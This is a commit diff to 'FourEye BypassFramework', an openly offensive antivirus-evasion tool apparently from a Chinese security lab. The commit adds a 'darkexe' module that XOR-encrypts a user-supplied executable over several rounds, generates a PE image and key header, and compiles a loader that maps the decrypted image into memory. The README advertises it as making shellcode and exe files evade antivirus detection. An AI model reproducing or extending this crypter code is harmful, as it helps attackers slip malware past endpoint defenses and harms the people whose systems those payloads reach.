lengjibo
diff --git a/‎BypassFramework.py‎
Lines changed: 7 additions & 4 deletions b/‎BypassFramework.py‎
Lines changed: 7 additions & 4 deletions
diff --git a/‎README.md‎
Lines changed: 6 additions & 2 deletions b/‎README.md‎
Lines changed: 6 additions & 2 deletions
diff --git a/‎core/__pycache__/functions.cpython-38.pyc‎
0 Bytes b/‎core/__pycache__/functions.cpython-38.pyc‎
0 Bytes
diff --git a/‎core/functions.py‎
Lines changed: 5 additions & 1 deletion b/‎core/functions.py‎
Lines changed: 5 additions & 1 deletion
diff --git a/‎module/darkexe/__pycache__/darkexe.cpython-38.pyc‎
2.42 KB b/‎module/darkexe/__pycache__/darkexe.cpython-38.pyc‎
2.42 KB
diff --git a/‎module/darkexe/build/main.h‎
Lines changed: 8 additions & 0 deletions b/‎module/darkexe/build/main.h‎
Lines changed: 8 additions & 0 deletions
diff --git a/‎module/darkexe/build/pe_image.h‎
Lines changed: 78869 additions & 0 deletions b/‎module/darkexe/build/pe_image.h‎
Lines changed: 78869 additions & 0 deletions
diff --git a/‎module/darkexe/darkexe.py‎
Lines changed: 66 additions & 0 deletions b/‎module/darkexe/darkexe.py‎
Lines changed: 66 additions & 0 deletions
diff --git a/‎module/darkexe/lib/__pycache__/auxiliary.cpython-38.pyc‎
2.89 KB b/‎module/darkexe/lib/__pycache__/auxiliary.cpython-38.pyc‎
2.89 KB
diff --git a/‎module/darkexe/lib/__pycache__/compile.cpython-38.pyc‎
762 Bytes b/‎module/darkexe/lib/__pycache__/compile.cpython-38.pyc‎
762 Bytes
@@ -1,14 +1,12 @@
 #!/usr/bin/python
 
-from termcolor import colored
-import os
-import logging
-import sys
 from core.functions import *
 import readline
 from module.memory.CreateFiber import *
 from module.memory.QueueUserAPC import *
 from module.Separation.imageShell import *
+from module.darkexe.darkexe import *
+from termcolor import colored
 
 python_version = sys.version_info[0]
 
@@ -34,6 +32,11 @@
         if command == "help":
             help()
 
+        if command.split(" ")[0] == "exe":
+            shellcode_add = input("\033[4mPlease input Your exe:\033[0m" + colored(" >>", "green"))
+            darkarmour = Darkexe()
+            darkarmour.run(args=shellcode_add)
+
         if command.split(" ")[0] == "shellcode":
             readline.set_completer(shellcode_completer)
             readline.parse_and_bind("tab: complete")
 
@@ -12,7 +12,7 @@
                                  \|   
 
 
-                    v1.0 stable !
+                    v1.5 stable !
                     author lengyi@HongHuSec Lab !
 
  FourEye BypassFrameWork | BypassAV your shellcode && exe 
@@ -46,8 +46,12 @@ https://www.bilibili.com/video/BV1zy4y1S7ZM/
 
 大多数方法均为网上已经公开的方法，本人只是对其整合、优化，多来自于ired，感谢其分享精神。
 
+## update
+
+12.14：增加其对exe的免杀，方法参考@bats3c
+
 ## TODO
 
 - 增加更多的免杀、shellcode加密方法
-- 增加直接对exe进行免杀
+
 
@@ -4,6 +4,8 @@
 import os
 
 
+
+
 oct_commands = ["exe","shellcode","list","back","help","exit"]
 shellcode_commands = ["xor","rot13","list","execute","png","exit","back"]
 
@@ -55,6 +57,8 @@ def shellcode2_execute():
     except:
         print(colored("[-]error\n","cyan"))
 
+
+
 def banner():
     version = '\33[43m V1.0 Beta \033[0m'
     Yellow = '\33[33m'
@@ -73,7 +77,7 @@ def banner():
                                  \|   
 {1}
 
-                    {3}v1.0 stable !{1}
+                    {3}v1.5 stable !{1}
                     {3}author lengyi@HongHuSec Lab !{1}
 
 {2} FourEye BypassFrameWork | BypassAV your shellcode && exe {1}
 
@@ -0,0 +1,8 @@
+#define key0 0x5a
+#define key1 0x5f
+#define key2 0x2a
+#define key3 0x4a
+#define key4 0x62
+
+VOID FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_header);
+LPVOID MapImageToMemory(LPVOID base_addr);
@@ -0,0 +1,66 @@
+import sys
+from module.darkexe.lib import compile
+from module.darkexe.lib  import auxiliary
+from module.darkexe.lib  import encryption
+from termcolor import colored
+
+
+class Darkexe(object):
+    def __init__(self):
+        super(Darkexe, self).__init__()
+        self.enc_algos = ["xor"]
+        self.compile_binary = compile.Binary()
+
+    def _do_encrypt(self):
+        print(f"[i] Begining encryption via {self.crypt_type.upper()}")
+        keys_used = {}
+        for loop in range(self.loops):
+            if self.crypt_type == "xor":
+                crypt = encryption.XOR()
+            if loop == 0:
+                bytes, len, key = crypt.crypt_file(True, crypt.key, infile=self.in_file)
+            else:
+                bytes, len, key = crypt.crypt_file(True, crypt.key, infile=None, data=bytes, data_length=len)
+            keys_used[str(loop)] = key
+            if loop != self.loops - 1:
+                bytes = auxiliary.clean_hex_output(bytes)
+        return bytes, len, keys_used
+
+
+    def _do_jmp(self):
+        bytes, length, keys_used = self._do_encrypt()
+
+        keys = []
+        for i in keys_used: keys.append(hex(int(i)))
+
+        pe_image = auxiliary.prepare_pe_image(length, bytes)
+        auxiliary.write_pe_image(pe_image)
+
+        auxiliary.write_header_file(keys_used, jmp=True)
+        file_clean = auxiliary.write_decrypt("./module/darkexe/src/jmp_loader/main.c", self.loops)
+
+        self.compile_binary.compile("./module/darkexe/src/jmp_loader/main.c", self.out_file)
+        auxiliary.clean_up("./module/darkexe/src/jmp_loader/main.c", file_clean)
+        print(f"[+] Wrote {auxiliary.get_size('/root/' + self.out_file)} bytes to /root/{self.out_file}")
+
+
+
+    def _parse_args(self, args):
+        self.jmp = True
+        self.in_file = args
+        self.crypt_type = 'xor'
+        self.loops = 5
+        self.out_file = auxiliary.gen_rand_filename() + ".exe"
+
+    def _do_crypt(self):
+        print(f"[i] Started armouring {self.in_file} ({auxiliary.get_size(self.in_file)} bytes)")
+        if self.jmp:
+            self._do_jmp()
+
+    def run(self, args):
+
+        file_add = args
+
+        self._parse_args(args=file_add)
+        self._do_crypt()
+